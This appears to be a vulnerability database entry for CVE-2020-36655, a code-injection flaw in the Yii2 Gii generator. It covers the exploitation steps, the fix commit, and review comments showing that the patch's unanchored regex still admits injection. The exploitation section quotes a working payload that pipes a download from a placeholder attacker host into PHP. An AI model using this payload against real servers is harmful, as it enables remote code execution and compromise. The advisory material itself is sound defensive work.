CVE-2020-36655
Description
Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Yii2 Gii before 2.2.2 allows arbitrary code execution via the messageCategory field in Generator.php.
Vulnerability
Overview
CVE-2020-36655 is a remote code execution vulnerability in the Yii2 Gii module, a code generator for the Yii framework. The issue resides in the Generator.php file, where the messageCategory parameter is not properly sanitized before being used in generated model files. When the "Enable I18N" checkbox is selected, the messageCategory field becomes active, and an attacker can inject arbitrary PHP code into it. This lack of input validation allows the injected code to be written directly into the generated model file, leading to code execution on the server [1][2].
Exploitation
To exploit the vulnerability, an attacker must have access to the Gii module's web interface, which is often exposed in development or staging environments. The application must have a database configured and an existing table name specified. The attacker then selects the "Enable I18N" option and provides a malicious payload in the Message Category field, such as aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler();. After previewing and generating the code, the malicious code is embedded into the model file. To trigger execution, the attacker can then use the Form Generator to load that model, which will evaluate the injected PHP code [2].
Impact
Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary PHP code on the server. This can lead to full system compromise, including data theft, lateral movement within the network, or further attacks against production systems, as demonstrated in a real-world scenario where an attacker moved from a staging environment to production [2].
Mitigation
Patched versions are Yii2 Gii 2.2.2 and later. The fix, introduced in commit ed61e0d, adds validation to the messageCategory field, restricting it to alphanumeric characters and underscores [4]. Users should update to at least version 2.2.2 or apply the provided temporary patch [2]. Note that Gii is intended for development use only and should never be enabled in production environments.
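As an added illustration (example code, not from yii2-gii or the cited sources): the fix commit validates messageCategory with a regular expression, and whether such a check actually restricts the value to alphanumerics and underscores depends on the pattern being anchored. The block below contrasts an unanchored word-character check with an anchored one over constructed inputs, including an injection-shaped value that would break out of a quoted string in a generated model. The function names and sample values are hypothetical.

```php
<?php
// Added example, not code from the yii2-gii project. Function names are
// hypothetical; sample inputs are constructed for the demonstration.

/** Unanchored check: succeeds if the value contains ANY word character. */
function categoryPassesUnanchored(string $category): bool
{
    return $category !== '' && preg_match('~\w+~', $category) === 1;
}

/** Anchored check: the WHOLE value must consist of word characters. */
function categoryPassesAnchored(string $category): bool
{
    // \z rather than $ so a trailing newline cannot slip past the check.
    // Without the `u` modifier, \w is ASCII [A-Za-z0-9_] only.
    return $category !== '' && preg_match('~^\w+\z~', $category) === 1;
}

// Constructed samples => whether the intended policy should accept them.
$samples = [
    'app'                => true,
    'user_profile'       => true,
    "app', 'x'),];}} //" => false,  // constructed, injection-shaped
    "app\n"              => false,  // trailing newline
    ''                   => false,
];

foreach ($samples as $value => $shouldPass) {
    printf("%-24s unanchored=%-6s anchored=%s\n",
        json_encode($value),
        categoryPassesUnanchored($value) ? 'pass' : 'reject',
        categoryPassesAnchored($value) ? 'pass' : 'reject');
    // Only the anchored variant agrees with the policy on every sample;
    // the unanchored one accepts the injection-shaped and newline values.
    assert(categoryPassesAnchored($value) === $shouldPass);
}
```

Run with `php example.php`; the output shows the unanchored check passing the two values that the anchored check rejects, which is why an allow-list validator on data written into source code must match the entire string.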
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| yiisoft/yii2-gii (Packagist) | < 2.2.2 | 2.2.2 |
Affected products
- Yii/Yii2 Gii
Patches
ed61e0d85f43 Fix #433: Fix insufficient category validation
2 files changed · +7 −3
CHANGELOG.md+1 −1 modified@@ -7,7 +7,7 @@ Yii Framework 2 gii extension Change Log - Enh #450: Add behaviors merging, pagination example, sorting example, loading defaults for a model to CRUD controller (WinterSilence) - Enh #444: Updated reserved keywords in generator (WinterSilence) - Bug #439: Replace client-side generation of model class name with an AJAX request and a serverside implementation to take options into account (WinterSilence) - +- Bug #433: Fix insufficient category validation (samdark) 2.2.1 May 02, 2020 ------------------
src/Generator.php+6 −2 modified@@ -389,8 +389,12 @@ public function validateNewClass($attribute, $params) */ public function validateMessageCategory() { - if ($this->enableI18N && empty($this->messageCategory)) { - $this->addError('messageCategory', "Message Category cannot be blank."); + if ($this->enableI18N) { + if (empty($this->messageCategory)) { + $this->addError('messageCategory', "Message Category cannot be blank."); + } elseif (!preg_match('~\w+~', $this->messageCategory)) { + $this->addError('messageCategory', "Message Category is not valid. It should contain only alphanumeric characters and _."); + } } }
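Review bot: the CHANGELOG entry added for #433 reads like a routine bug fix, but the insufficient validation it closes allowed PHP code to be written into generated model files, so the line should state the security impact and point at the advisory (GHSA-3mpg-q26j-83j5) so that users scanning the log recognise it as a security release, e.g. `- Bug #433: Fix insufficient category validation allowing code injection into generated models (samdark)`.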
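Review bot: the new `elseif` branch in validateMessageCategory() does not enforce what its error message promises. `preg_match('~\w+~', $this->messageCategory)` is unanchored, so it succeeds for any value that contains at least one word character; a category such as `app', 'x'),];}}` still passes even though the message says only alphanumeric characters and `_` are allowed. Anchor the pattern, e.g. `} elseif (!preg_match('~^\w+\z~', $this->messageCategory)) {` (using `\z` rather than `$` so a trailing newline is also rejected), or equivalently reject any non-word character with `preg_match('~[^\w]~', ...)`. A comment noting that `\w` without the `u` modifier is ASCII-only would make the intended policy explicit.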
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-3mpg-q26j-83j5 (GHSA; advisory)
- nvd.nist.gov/vuln/detail/CVE-2020-36655 (GHSA; advisory)
- github.com/yiisoft/yii2-gii/commit/ed61e0d85f43e23f79d7c9d1b4e5e5c09a32ce4b (GHSA; web)
- github.com/yiisoft/yii2-gii/issues/433 (GHSA; web)
- lab.wallarm.com/yii2-gii-remote-code-execution (GHSA; web)
- lab.wallarm.com/yii2-gii-remote-code-execution/ (MITRE)